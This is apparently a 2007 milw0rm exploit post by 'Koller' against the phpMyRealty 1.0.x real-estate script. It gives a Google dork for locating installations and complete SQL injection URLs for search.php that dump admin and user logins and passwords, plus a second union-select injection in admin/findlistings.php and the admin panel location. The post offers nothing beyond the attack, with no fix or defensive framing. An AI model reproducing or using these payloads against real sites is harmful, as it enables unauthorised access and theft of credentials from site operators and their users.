# xaker.name & grabberz.com # # .__ __. # NN) NNNN JNNN` NNNN. NNN NNNNNNNNNNN NN) # NN) `NNN).NNNF .NNNNN (NN) """4NNN"""` NN) # NN) (NNNNNN` (NNNNN) NNN (NNN NN) # NN) 4NNNN` NNN(NNN.NNF NNN) NN) # NN) JNNNNL (NN) NNNNNN) (NNN NN) # NN) JNNNNNN) JNN` `NNNNN JNNF NN) # NN) .NNNF (NNN. NNN 4NNN) NNN) NN) # NN) JNNN` NNNN (NN) NNN` (NNN NN) # NN) NN) # .__ http://xaker.name __. # # # script name : phpMyRealty 1.0.x # GoogLe Dork : Powered by phpMyRealty # Script demo : www.phpmyrealty.com/demo/index.php # The price : $99.95 # Risk : Average # Found By : Koller # Thanks : | robo9 | rijy | Concord | Helkern | Constantine | -St1ff- | .dot | @$_terr_X | b3 | # Vulnerable files : search.php, findlistings.php # Vuln : www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins # www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_users # # Admin panel: www.victim.com/admin/index.php # # Addon :) - sql-injection in findlistings.php # www.victim.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* # Contact: K0ller (at) hotmail (dot) CoM # milw0rm.com [2007-12-18]